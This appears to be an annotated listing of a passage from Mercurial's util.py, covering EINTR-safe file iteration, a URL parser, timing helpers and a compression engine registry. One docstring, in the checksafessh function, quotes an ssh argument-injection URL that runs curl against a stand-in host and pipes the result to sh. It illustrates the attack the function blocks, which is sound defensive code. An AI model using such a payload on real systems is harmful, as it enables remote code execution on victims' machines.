2425 2423 # correctly. The following table shows what CPython version (and functions)
2426 2424 # are affected (buggy: has the EINTR bug, okay: otherwise):
2427 2425 #
2428 2426 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2429 2427 # --------------------------------------------------
2430 2428 # fp.__iter__ | buggy | buggy | okay
2431 2429 # fp.read* | buggy | okay [1] | okay
2432 2430 #
2433 2431 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2434 2432 #
2435 2433 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2436 2434 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2437 2435 #
2438 2436 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2439 2437 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2440 2438 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2441 2439 # fp.__iter__ but not other fp.read* methods.
2442 2440 #
2443 2441 # On modern systems like Linux, the "read" syscall cannot be interrupted
2444 2442 # when reading "fast" files like on-disk files. So the EINTR issue only
2445 2443 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2446 2444 # files approximately as "fast" files and use the fast (unsafe) code path,
2447 2445 # to minimize the performance impact.
2448 2446 if sys.version_info >= (2, 7, 4):
2449 2447 # fp.readline deals with EINTR correctly, use it as a workaround.
2450 2448 def _safeiterfile(fp):
2451 2449 return iter(fp.readline, '')
2452 2450 else:
2453 2451 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2454 2452 # note: this may block longer than necessary because of bufsize.
2455 2453 def _safeiterfile(fp, bufsize=4096):
2456 2454 fd = fp.fileno()
2457 2455 line = ''
2458 2456 while True:
2459 2457 try:
2460 2458 buf = os.read(fd, bufsize)
2461 2459 except OSError as ex:
2462 2460 # os.read only raises EINTR before any data is read
2463 2461 if ex.errno == errno.EINTR:
2464 2462 continue
2465 2463 else:
2466 2464 raise
2467 2465 line += buf
2468 2466 if '\n' in buf:
2469 2467 splitted = line.splitlines(True)
2470 2468 line = ''
2471 2469 for l in splitted:
2472 2470 if l[-1] == '\n':
2473 2471 yield l
2474 2472 else:
2475 2473 line = l
2476 2474 if not buf:
2477 2475 break
2478 2476 if line:
2479 2477 yield line
2480 2478
2481 2479 def iterfile(fp):
2482 2480 fastpath = True
2483 2481 if type(fp) is file:
2484 2482 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2485 2483 if fastpath:
2486 2484 return fp
2487 2485 else:
2488 2486 return _safeiterfile(fp)
2489 2487 else:
2490 2488 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2491 2489 def iterfile(fp):
2492 2490 return fp
2493 2491
2494 2492 def iterlines(iterator):
2495 2493 for chunk in iterator:
2496 2494 for line in chunk.splitlines():
2497 2495 yield line
2498 2496
2499 2497 def expandpath(path):
2500 2498 return os.path.expanduser(os.path.expandvars(path))
2501 2499
2502 2500 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2503 2501 """Return the result of interpolating items in the mapping into string s.
2504 2502
2505 2503 prefix is a single character string, or a two character string with
2506 2504 a backslash as the first character if the prefix needs to be escaped in
2507 2505 a regular expression.
2508 2506
2509 2507 fn is an optional function that will be applied to the replacement text
2510 2508 just before replacement.
2511 2509
2512 2510 escape_prefix is an optional flag that allows using doubled prefix for
2513 2511 its escaping.
2514 2512 """
2515 2513 fn = fn or (lambda s: s)
2516 2514 patterns = '|'.join(mapping.keys())
2517 2515 if escape_prefix:
2518 2516 patterns += '|' + prefix
2519 2517 if len(prefix) > 1:
2520 2518 prefix_char = prefix[1:]
2521 2519 else:
2522 2520 prefix_char = prefix
2523 2521 mapping[prefix_char] = prefix_char
2524 2522 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2525 2523 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2526 2524
2527 2525 def getport(port):
2528 2526 """Return the port for a given network service.
2529 2527
2530 2528 If port is an integer, it's returned as is. If it's a string, it's
2531 2529 looked up using socket.getservbyname(). If there's no matching
2532 2530 service, error.Abort is raised.
2533 2531 """
2534 2532 try:
2535 2533 return int(port)
2536 2534 except ValueError:
2537 2535 pass
2538 2536
2539 2537 try:
2540 2538 return socket.getservbyname(pycompat.sysstr(port))
2541 2539 except socket.error:
2542 2540 raise error.Abort(_("no port number associated with service '%s'")
2543 2541 % port)
2544 2542
2545 2543 class url(object):
2546 2544 r"""Reliable URL parser.
2547 2545
2548 2546 This parses URLs and provides attributes for the following
2549 2547 components:
2550 2548
2551 2549 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2552 2550
2553 2551 Missing components are set to None. The only exception is
2554 2552 fragment, which is set to '' if present but empty.
2555 2553
2556 2554 If parsefragment is False, fragment is included in query. If
2557 2555 parsequery is False, query is included in path. If both are
2558 2556 False, both fragment and query are included in path.
2559 2557
2560 2558 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2561 2559
2562 2560 Note that for backward compatibility reasons, bundle URLs do not
2563 2561 take host names. That means 'bundle://../' has a path of '../'.
2564 2562
2565 2563 Examples:
2566 2564
2567 2565 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2568 2566 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2569 2567 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2570 2568 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2571 2569 >>> url(b'file:///home/joe/repo')
2572 2570 <url scheme: 'file', path: '/home/joe/repo'>
2573 2571 >>> url(b'file:///c:/temp/foo/')
2574 2572 <url scheme: 'file', path: 'c:/temp/foo/'>
2575 2573 >>> url(b'bundle:foo')
2576 2574 <url scheme: 'bundle', path: 'foo'>
2577 2575 >>> url(b'bundle://../foo')
2578 2576 <url scheme: 'bundle', path: '../foo'>
2579 2577 >>> url(br'c:\foo\bar')
2580 2578 <url path: 'c:\\foo\\bar'>
2581 2579 >>> url(br'\\blah\blah\blah')
2582 2580 <url path: '\\\\blah\\blah\\blah'>
2583 2581 >>> url(br'\\blah\blah\blah#baz')
2584 2582 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2585 2583 >>> url(br'file:///C:\users\me')
2586 2584 <url scheme: 'file', path: 'C:\\users\\me'>
2587 2585
2588 2586 Authentication credentials:
2589 2587
2590 2588 >>> url(b'ssh://joe:xyz@x/repo')
2591 2589 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2592 2590 >>> url(b'ssh://joe@x/repo')
2593 2591 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2594 2592
2595 2593 Query strings and fragments:
2596 2594
2597 2595 >>> url(b'http://host/a?b#c')
2598 2596 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2599 2597 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2600 2598 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2601 2599
2602 2600 Empty path:
2603 2601
2604 2602 >>> url(b'')
2605 2603 <url path: ''>
2606 2604 >>> url(b'#a')
2607 2605 <url path: '', fragment: 'a'>
2608 2606 >>> url(b'http://host/')
2609 2607 <url scheme: 'http', host: 'host', path: ''>
2610 2608 >>> url(b'http://host/#a')
2611 2609 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2612 2610
2613 2611 Only scheme:
2614 2612
2615 2613 >>> url(b'http:')
2616 2614 <url scheme: 'http'>
2617 2615 """
2618 2616
2619 2617 _safechars = "!~*'()+"
2620 2618 _safepchars = "/!~*'()+:\\"
2621 2619 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2622 2620
2623 2621 def __init__(self, path, parsequery=True, parsefragment=True):
2624 2622 # We slowly chomp away at path until we have only the path left
2625 2623 self.scheme = self.user = self.passwd = self.host = None
2626 2624 self.port = self.path = self.query = self.fragment = None
2627 2625 self._localpath = True
2628 2626 self._hostport = ''
2629 2627 self._origpath = path
2630 2628
2631 2629 if parsefragment and '#' in path:
2632 2630 path, self.fragment = path.split('#', 1)
2633 2631
2634 2632 # special case for Windows drive letters and UNC paths
2635 2633 if hasdriveletter(path) or path.startswith('\\\\'):
2636 2634 self.path = path
2637 2635 return
2638 2636
2639 2637 # For compatibility reasons, we can't handle bundle paths as
2640 2638 # normal URLS
2641 2639 if path.startswith('bundle:'):
2642 2640 self.scheme = 'bundle'
2643 2641 path = path[7:]
2644 2642 if path.startswith('//'):
2645 2643 path = path[2:]
2646 2644 self.path = path
2647 2645 return
2648 2646
2649 2647 if self._matchscheme(path):
2650 2648 parts = path.split(':', 1)
2651 2649 if parts[0]:
2652 2650 self.scheme, path = parts
2653 2651 self._localpath = False
2654 2652
2655 2653 if not path:
2656 2654 path = None
2657 2655 if self._localpath:
2658 2656 self.path = ''
2659 2657 return
2660 2658 else:
2661 2659 if self._localpath:
2662 2660 self.path = path
2663 2661 return
2664 2662
2665 2663 if parsequery and '?' in path:
2666 2664 path, self.query = path.split('?', 1)
2667 2665 if not path:
2668 2666 path = None
2669 2667 if not self.query:
2670 2668 self.query = None
2671 2669
2672 2670 # // is required to specify a host/authority
2673 2671 if path and path.startswith('//'):
2674 2672 parts = path[2:].split('/', 1)
2675 2673 if len(parts) > 1:
2676 2674 self.host, path = parts
2677 2675 else:
2678 2676 self.host = parts[0]
2679 2677 path = None
2680 2678 if not self.host:
2681 2679 self.host = None
2682 2680 # path of file:///d is /d
2683 2681 # path of file:///d:/ is d:/, not /d:/
2684 2682 if path and not hasdriveletter(path):
2685 2683 path = '/' + path
2686 2684
2687 2685 if self.host and '@' in self.host:
2688 2686 self.user, self.host = self.host.rsplit('@', 1)
2689 2687 if ':' in self.user:
2690 2688 self.user, self.passwd = self.user.split(':', 1)
2691 2689 if not self.host:
2692 2690 self.host = None
2693 2691
2694 2692 # Don't split on colons in IPv6 addresses without ports
2695 2693 if (self.host and ':' in self.host and
2696 2694 not (self.host.startswith('[') and self.host.endswith(']'))):
2697 2695 self._hostport = self.host
2698 2696 self.host, self.port = self.host.rsplit(':', 1)
2699 2697 if not self.host:
2700 2698 self.host = None
2701 2699
2702 2700 if (self.host and self.scheme == 'file' and
2703 2701 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2704 2702 raise error.Abort(_('file:// URLs can only refer to localhost'))
2705 2703
2706 2704 self.path = path
2707 2705
2708 2706 # leave the query string escaped
2709 2707 for a in ('user', 'passwd', 'host', 'port',
2710 2708 'path', 'fragment'):
2711 2709 v = getattr(self, a)
2712 2710 if v is not None:
2713 2711 setattr(self, a, urlreq.unquote(v))
2714 2712
2715 2713 @encoding.strmethod
2716 2714 def __repr__(self):
2717 2715 attrs = []
2718 2716 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2719 2717 'query', 'fragment'):
2720 2718 v = getattr(self, a)
2721 2719 if v is not None:
2722 2720 attrs.append('%s: %r' % (a, v))
2723 2721 return '<url %s>' % ', '.join(attrs)
2724 2722
2725 2723 def __bytes__(self):
2726 2724 r"""Join the URL's components back into a URL string.
2727 2725
2728 2726 Examples:
2729 2727
2730 2728 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2731 2729 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2732 2730 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2733 2731 'http://user:pw@host:80/?foo=bar&baz=42'
2734 2732 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2735 2733 'http://user:pw@host:80/?foo=bar%3dbaz'
2736 2734 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2737 2735 'ssh://user:pw@[::1]:2200//home/joe#'
2738 2736 >>> bytes(url(b'http://localhost:80//'))
2739 2737 'http://localhost:80//'
2740 2738 >>> bytes(url(b'http://localhost:80/'))
2741 2739 'http://localhost:80/'
2742 2740 >>> bytes(url(b'http://localhost:80'))
2743 2741 'http://localhost:80/'
2744 2742 >>> bytes(url(b'bundle:foo'))
2745 2743 'bundle:foo'
2746 2744 >>> bytes(url(b'bundle://../foo'))
2747 2745 'bundle:../foo'
2748 2746 >>> bytes(url(b'path'))
2749 2747 'path'
2750 2748 >>> bytes(url(b'file:///tmp/foo/bar'))
2751 2749 'file:///tmp/foo/bar'
2752 2750 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2753 2751 'file:///c:/tmp/foo/bar'
2754 2752 >>> print(url(br'bundle:foo\bar'))
2755 2753 bundle:foo\bar
2756 2754 >>> print(url(br'file:///D:\data\hg'))
2757 2755 file:///D:\data\hg
2758 2756 """
2759 2757 if self._localpath:
2760 2758 s = self.path
2761 2759 if self.scheme == 'bundle':
2762 2760 s = 'bundle:' + s
2763 2761 if self.fragment:
2764 2762 s += '#' + self.fragment
2765 2763 return s
2766 2764
2767 2765 s = self.scheme + ':'
2768 2766 if self.user or self.passwd or self.host:
2769 2767 s += '//'
2770 2768 elif self.scheme and (not self.path or self.path.startswith('/')
2771 2769 or hasdriveletter(self.path)):
2772 2770 s += '//'
2773 2771 if hasdriveletter(self.path):
2774 2772 s += '/'
2775 2773 if self.user:
2776 2774 s += urlreq.quote(self.user, safe=self._safechars)
2777 2775 if self.passwd:
2778 2776 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2779 2777 if self.user or self.passwd:
2780 2778 s += '@'
2781 2779 if self.host:
2782 2780 if not (self.host.startswith('[') and self.host.endswith(']')):
2783 2781 s += urlreq.quote(self.host)
2784 2782 else:
2785 2783 s += self.host
2786 2784 if self.port:
2787 2785 s += ':' + urlreq.quote(self.port)
2788 2786 if self.host:
2789 2787 s += '/'
2790 2788 if self.path:
2791 2789 # TODO: similar to the query string, we should not unescape the
2792 2790 # path when we store it, the path might contain '%2f' = '/',
2793 2791 # which we should *not* escape.
2794 2792 s += urlreq.quote(self.path, safe=self._safepchars)
2795 2793 if self.query:
2796 2794 # we store the query in escaped form.
2797 2795 s += '?' + self.query
2798 2796 if self.fragment is not None:
2799 2797 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2800 2798 return s
2801 2799
2802 2800 __str__ = encoding.strmethod(__bytes__)
2803 2801
2804 2802 def authinfo(self):
2805 2803 user, passwd = self.user, self.passwd
2806 2804 try:
2807 2805 self.user, self.passwd = None, None
2808 2806 s = bytes(self)
2809 2807 finally:
2810 2808 self.user, self.passwd = user, passwd
2811 2809 if not self.user:
2812 2810 return (s, None)
2813 2811 # authinfo[1] is passed to urllib2 password manager, and its
2814 2812 # URIs must not contain credentials. The host is passed in the
2815 2813 # URIs list because Python < 2.4.3 uses only that to search for
2816 2814 # a password.
2817 2815 return (s, (None, (s, self.host),
2818 2816 self.user, self.passwd or ''))
2819 2817
2820 2818 def isabs(self):
2821 2819 if self.scheme and self.scheme != 'file':
2822 2820 return True # remote URL
2823 2821 if hasdriveletter(self.path):
2824 2822 return True # absolute for our purposes - can't be joined()
2825 2823 if self.path.startswith(br'\\'):
2826 2824 return True # Windows UNC path
2827 2825 if self.path.startswith('/'):
2828 2826 return True # POSIX-style
2829 2827 return False
2830 2828
2831 2829 def localpath(self):
2832 2830 if self.scheme == 'file' or self.scheme == 'bundle':
2833 2831 path = self.path or '/'
2834 2832 # For Windows, we need to promote hosts containing drive
2835 2833 # letters to paths with drive letters.
2836 2834 if hasdriveletter(self._hostport):
2837 2835 path = self._hostport + '/' + self.path
2838 2836 elif (self.host is not None and self.path
2839 2837 and not hasdriveletter(path)):
2840 2838 path = '/' + path
2841 2839 return path
2842 2840 return self._origpath
2843 2841
2844 2842 def islocal(self):
2845 2843 '''whether localpath will return something that posixfile can open'''
2846 2844 return (not self.scheme or self.scheme == 'file'
2847 2845 or self.scheme == 'bundle')
2848 2846
2849 2847 def hasscheme(path):
2850 2848 return bool(url(path).scheme)
2851 2849
2852 2850 def hasdriveletter(path):
2853 2851 return path and path[1:2] == ':' and path[0:1].isalpha()
2854 2852
2855 2853 def urllocalpath(path):
2856 2854 return url(path, parsequery=False, parsefragment=False).localpath()
2857 2855
2858 2856 def checksafessh(path):
2859 2857 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2860 2858
2861 2859 This is a sanity check for ssh urls. ssh will parse the first item as
2862 2860 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2863 2861 Let's prevent these potentially exploited urls entirely and warn the
2864 2862 user.
2865 2863
2866 2864 Raises an error.Abort when the url is unsafe.
2867 2865 """
2868 2866 path = urlreq.unquote(path)
2869 2867 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2870 2868 raise error.Abort(_('potentially unsafe url: %r') %
2871 2869 (pycompat.bytestr(path),))
2872 2870
2873 2871 def hidepassword(u):
2874 2872 '''hide user credential in a url string'''
2875 2873 u = url(u)
2876 2874 if u.passwd:
2877 2875 u.passwd = '***'
2878 2876 return bytes(u)
2879 2877
2880 2878 def removeauth(u):
2881 2879 '''remove all authentication information from a url string'''
2882 2880 u = url(u)
2883 2881 u.user = u.passwd = None
2884 2882 return bytes(u)
2885 2883
2886 2884 timecount = unitcountfn(
2887 2885 (1, 1e3, _('%.0f s')),
2888 2886 (100, 1, _('%.1f s')),
2889 2887 (10, 1, _('%.2f s')),
2890 2888 (1, 1, _('%.3f s')),
2891 2889 (100, 0.001, _('%.1f ms')),
2892 2890 (10, 0.001, _('%.2f ms')),
2893 2891 (1, 0.001, _('%.3f ms')),
2894 2892 (100, 0.000001, _('%.1f us')),
2895 2893 (10, 0.000001, _('%.2f us')),
2896 2894 (1, 0.000001, _('%.3f us')),
2897 2895 (100, 0.000000001, _('%.1f ns')),
2898 2896 (10, 0.000000001, _('%.2f ns')),
2899 2897 (1, 0.000000001, _('%.3f ns')),
2900 2898 )
2901 2899
2902 2900 _timenesting = [0]
2903 2901
2904 2902 def timed(func):
2905 2903 '''Report the execution time of a function call to stderr.
2906 2904
2907 2905 During development, use as a decorator when you need to measure
2908 2906 the cost of a function, e.g. as follows:
2909 2907
2910 2908 @util.timed
2911 2909 def foo(a, b, c):
2912 2910 pass
2913 2911 '''
2914 2912
2915 2913 def wrapper(*args, **kwargs):
2916 2914 start = timer()
2917 2915 indent = 2
2918 2916 _timenesting[0] += indent
2919 2917 try:
2920 2918 return func(*args, **kwargs)
2921 2919 finally:
2922 2920 elapsed = timer() - start
2923 2921 _timenesting[0] -= indent
2924 2922 stderr.write('%s%s: %s\n' %
2925 2923 (' ' * _timenesting[0], func.__name__,
2926 2924 timecount(elapsed)))
2927 2925 return wrapper
2928 2926
2929 2927 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2930 2928 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2931 2929
2932 2930 def sizetoint(s):
2933 2931 '''Convert a space specifier to a byte count.
2934 2932
2935 2933 >>> sizetoint(b'30')
2936 2934 30
2937 2935 >>> sizetoint(b'2.2kb')
2938 2936 2252
2939 2937 >>> sizetoint(b'6M')
2940 2938 6291456
2941 2939 '''
2942 2940 t = s.strip().lower()
2943 2941 try:
2944 2942 for k, u in _sizeunits:
2945 2943 if t.endswith(k):
2946 2944 return int(float(t[:-len(k)]) * u)
2947 2945 return int(t)
2948 2946 except ValueError:
2949 2947 raise error.ParseError(_("couldn't parse size: %s") % s)
2950 2948
2951 2949 class hooks(object):
2952 2950 '''A collection of hook functions that can be used to extend a
2953 2951 function's behavior. Hooks are called in lexicographic order,
2954 2952 based on the names of their sources.'''
2955 2953
2956 2954 def __init__(self):
2957 2955 self._hooks = []
2958 2956
2959 2957 def add(self, source, hook):
2960 2958 self._hooks.append((source, hook))
2961 2959
2962 2960 def __call__(self, *args):
2963 2961 self._hooks.sort(key=lambda x: x[0])
2964 2962 results = []
2965 2963 for source, hook in self._hooks:
2966 2964 results.append(hook(*args))
2967 2965 return results
2968 2966
2969 2967 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2970 2968 '''Yields lines for a nicely formatted stacktrace.
2971 2969 Skips the 'skip' last entries, then return the last 'depth' entries.
2972 2970 Each file+linenumber is formatted according to fileline.
2973 2971 Each line is formatted according to line.
2974 2972 If line is None, it yields:
2975 2973 length of longest filepath+line number,
2976 2974 filepath+linenumber,
2977 2975 function
2978 2976
2979 2977 Not be used in production code but very convenient while developing.
2980 2978 '''
2981 2979 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2982 2980 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2983 2981 ][-depth:]
2984 2982 if entries:
2985 2983 fnmax = max(len(entry[0]) for entry in entries)
2986 2984 for fnln, func in entries:
2987 2985 if line is None:
2988 2986 yield (fnmax, fnln, func)
2989 2987 else:
2990 2988 yield line % (fnmax, fnln, func)
2991 2989
2992 2990 def debugstacktrace(msg='stacktrace', skip=0,
2993 2991 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2994 2992 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2995 2993 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2996 2994 By default it will flush stdout first.
2997 2995 It can be used everywhere and intentionally does not require an ui object.
2998 2996 Not be used in production code but very convenient while developing.
2999 2997 '''
3000 2998 if otherf:
3001 2999 otherf.flush()
3002 3000 f.write('%s at:\n' % msg.rstrip())
3003 3001 for line in getstackframes(skip + 1, depth=depth):
3004 3002 f.write(line)
3005 3003 f.flush()
3006 3004
3007 3005 class dirs(object):
3008 3006 '''a multiset of directory names from a dirstate or manifest'''
3009 3007
3010 3008 def __init__(self, map, skip=None):
3011 3009 self._dirs = {}
3012 3010 addpath = self.addpath
3013 3011 if safehasattr(map, 'iteritems') and skip is not None:
3014 3012 for f, s in map.iteritems():
3015 3013 if s[0] != skip:
3016 3014 addpath(f)
3017 3015 else:
3018 3016 for f in map:
3019 3017 addpath(f)
3020 3018
3021 3019 def addpath(self, path):
3022 3020 dirs = self._dirs
3023 3021 for base in finddirs(path):
3024 3022 if base in dirs:
3025 3023 dirs[base] += 1
3026 3024 return
3027 3025 dirs[base] = 1
3028 3026
3029 3027 def delpath(self, path):
3030 3028 dirs = self._dirs
3031 3029 for base in finddirs(path):
3032 3030 if dirs[base] > 1:
3033 3031 dirs[base] -= 1
3034 3032 return
3035 3033 del dirs[base]
3036 3034
3037 3035 def __iter__(self):
3038 3036 return iter(self._dirs)
3039 3037
3040 3038 def __contains__(self, d):
3041 3039 return d in self._dirs
3042 3040
3043 3041 if safehasattr(parsers, 'dirs'):
3044 3042 dirs = parsers.dirs
3045 3043
3046 3044 def finddirs(path):
3047 3045 pos = path.rfind('/')
3048 3046 while pos != -1:
3049 3047 yield path[:pos]
3050 3048 pos = path.rfind('/', 0, pos)
3051 3049
3052 3050 # compression code
3053 3051
3054 3052 SERVERROLE = 'server'
3055 3053 CLIENTROLE = 'client'
3056 3054
3057 3055 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3058 3056 (u'name', u'serverpriority',
3059 3057 u'clientpriority'))
3060 3058
3061 3059 class compressormanager(object):
3062 3060 """Holds registrations of various compression engines.
3063 3061
3064 3062 This class essentially abstracts the differences between compression
3065 3063 engines to allow new compression formats to be added easily, possibly from
3066 3064 extensions.
3067 3065
3068 3066 Compressors are registered against the global instance by calling its
3069 3067 ``register()`` method.
3070 3068 """
3071 3069 def __init__(self):
3072 3070 self._engines = {}
3073 3071 # Bundle spec human name to engine name.
3074 3072 self._bundlenames = {}
3075 3073 # Internal bundle identifier to engine name.
3076 3074 self._bundletypes = {}
3077 3075 # Revlog header to engine name.
3078 3076 self._revlogheaders = {}
3079 3077 # Wire proto identifier to engine name.
3080 3078 self._wiretypes = {}
3081 3079
3082 3080 def __getitem__(self, key):
3083 3081 return self._engines[key]
3084 3082
3085 3083 def __contains__(self, key):
3086 3084 return key in self._engines
3087 3085
3088 3086 def __iter__(self):
3089 3087 return iter(self._engines.keys())
3090 3088
3091 3089 def register(self, engine):
3092 3090 """Register a compression engine with the manager.
3093 3091
3094 3092 The argument must be a ``compressionengine`` instance.
3095 3093 """
3096 3094 if not isinstance(engine, compressionengine):
3097 3095 raise ValueError(_('argument must be a compressionengine'))
3098 3096
3099 3097 name = engine.name()
3100 3098
3101 3099 if name in self._engines:
3102 3100 raise error.Abort(_('compression engine %s already registered') %
3103 3101 name)
3104 3102
3105 3103 bundleinfo = engine.bundletype()
3106 3104 if bundleinfo:
3107 3105 bundlename, bundletype = bundleinfo
3108 3106
3109 3107 if bundlename in self._bundlenames:
3110 3108 raise error.Abort(_('bundle name %s already registered') %
3111 3109 bundlename)
3112 3110 if bundletype in self._bundletypes:
3113 3111 raise error.Abort(_('bundle type %s already registered by %s') %
3114 3112 (bundletype, self._bundletypes[bundletype]))
3115 3113
3116 3114 # No external facing name declared.
3117 3115 if bundlename:
3118 3116 self._bundlenames[bundlename] = name
3119 3117
3120 3118 self._bundletypes[bundletype] = name
3121 3119
3122 3120 wiresupport = engine.wireprotosupport()
3123 3121 if wiresupport:
3124 3122 wiretype = wiresupport.name
3125 3123 if wiretype in self._wiretypes:
3126 3124 raise error.Abort(_('wire protocol compression %s already '
3127 3125 'registered by %s') %
3128 3126 (wiretype, self._wiretypes[wiretype]))
3129 3127
3130 3128 self._wiretypes[wiretype] = name
3131 3129
3132 3130 revlogheader = engine.revlogheader()
3133 3131 if revlogheader and revlogheader in self._revlogheaders:
3134 3132 raise error.Abort(_('revlog header %s already registered by %s') %
3135 3133 (revlogheader, self._revlogheaders[revlogheader]))
3136 3134
3137 3135 if revlogheader:
3138 3136 self._revlogheaders[revlogheader] = name
3139 3137
3140 3138 self._engines[name] = engine
3141 3139
3142 3140 @property
3143 3141 def supportedbundlenames(self):
3144 3142 return set(self._bundlenames.keys())
3145 3143
3146 3144 @property
3147 3145 def supportedbundletypes(self):
3148 3146 return set(self._bundletypes.keys())
3149 3147
3150 3148 def forbundlename(self, bundlename):
3151 3149 """Obtain a compression engine registered to a bundle name.
3152 3150
3153 3151 Will raise KeyError if the bundle type isn't registered.
3154 3152
3155 3153 Will abort if the engine is known but not available.
3156 3154 """
3157 3155 engine = self._engines[self._bundlenames[bundlename]]
3158 3156 if not engine.available():
3159 3157 raise error.Abort(_('compression engine %s could not be loaded') %
3160 3158 engine.name())
3161 3159 return engine
3162 3160
3163 3161 def forbundletype(self, bundletype):
3164 3162 """Obtain a compression engine registered to a bundle type.
3165 3163
3166 3164 Will raise KeyError if the bundle type isn't registered.
3167 3165
3168 3166 Will abort if the engine is known but not available.
3169 3167 """
3170 3168 engine = self._engines[self._bundletypes[bundletype]]
3171 3169 if not engine.available():
3172 3170 raise error.Abort(_('compression engine %s could not be loaded') %
3173 3171 engine.name())
3174 3172 return engine
3175 3173
3176 3174 def supportedwireengines(self, role, onlyavailable=True):
3177 3175 """Obtain compression engines that support the wire protocol.
3178 3176
3179 3177 Returns a list of engines in prioritized order, most desired first.
3180 3178
3181 3179 If ``onlyavailable`` is set, filter out engines that can't be
3182 3180 loaded.
3183 3181 """
3184 3182 assert role in (SERVERROLE, CLIENTROLE)
3185 3183
3186 3184 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3187 3185
3188 3186 engines = [self._engines[e] for e in self._wiretypes.values()]
3189 3187 if onlyavailable:
3190 3188 engines = [e for e in engines if e.available()]
3191 3189
3192 3190 def getkey(e):
3193 3191 # Sort first by priority, highest first. In case of tie, sort
3194 3192 # alphabetically. This is arbitrary, but ensures output is
3195 3193 # stable.
3196 3194 w = e.wireprotosupport()
3197 3195 return -1 * getattr(w, attr), w.name
3198 3196
3199 3197 return list(sorted(engines, key=getkey))
3200 3198
3201 3199 def forwiretype(self, wiretype):
3202 3200 engine = self._engines[self._wiretypes[wiretype]]
3203 3201 if not engine.available():
3204 3202 raise error.Abort(_('compression engine %s could not be loaded') %
3205 3203 engine.name())
3206 3204 return engine
3207 3205
3208 3206 def forrevlogheader(self, header):
3209 3207 """Obtain a compression engine registered to a revlog header.
3210 3208
3211 3209 Will raise KeyError if the revlog header value isn't registered.
3212 3210 """
3213 3211 return self._engines[self._revlogheaders[header]]
3214 3212
3215 3213 compengines = compressormanager()
3216 3214
3217 3215 class compressionengine(object):
3218 3216 """Base class for compression engines.
3219 3217
3220 3218 Compression engines must implement the interface defined by this class.
3221 3219 """
3222 3220 def name(self):
3223 3221 """Returns the name of the compression engine.
3224 3222
3225 3223 This is the key the engine is registered under.
3226 3224
3227 3225 This method must be implemented.
3228 3226 """
3229 3227 raise NotImplementedError()
3230 3228
3231 3229 def available(self):
3232 3230 """Whether the compression engine is available.
3233 3231
3234 3232 The intent of this method is to allow optional compression engines
3235 3233 that may not be available in all installations (such as engines relying
3236 3234 on C extensions that may not be present).
3237 3235 """
3238 3236 return True
3239 3237
3240 3238 def bundletype(self):
3241 3239 """Describes bundle identifiers for this engine.
3242 3240
3243 3241 If this compression engine isn't supported for bundles, returns None.
3244 3242
3245 3243 If this engine can be used for bundles, returns a 2-tuple of strings of
3246 3244 the user-facing "bundle spec" compression name and an internal
3247 3245 identifier used to denote the compression format within bundles. To
3248 3246 exclude the name from external usage, set the first element to ``None``.
3249 3247
3250 3248 If bundle compression is supported, the class must also implement
3251 3249 ``compressstream`` and `decompressorreader``.
3252 3250
3253 3251 The docstring of this method is used in the help system to tell users
3254 3252 about this engine.
3255 3253 """
3256 3254 return None
3257 3255
3258 3256 def wireprotosupport(self):
3259 3257 """Declare support for this compression format on the wire protocol.
3260 3258
3261 3259 If this compression engine isn't supported for compressing wire
3262 3260 protocol payloads, returns None.
3263 3261
3264 3262 Otherwise, returns ``compenginewireprotosupport`` with the following
3265 3263 fields:
3266 3264
3267 3265 * String format identifier
3268 3266 * Integer priority for the server
3269 3267 * Integer priority for the client
3270 3268
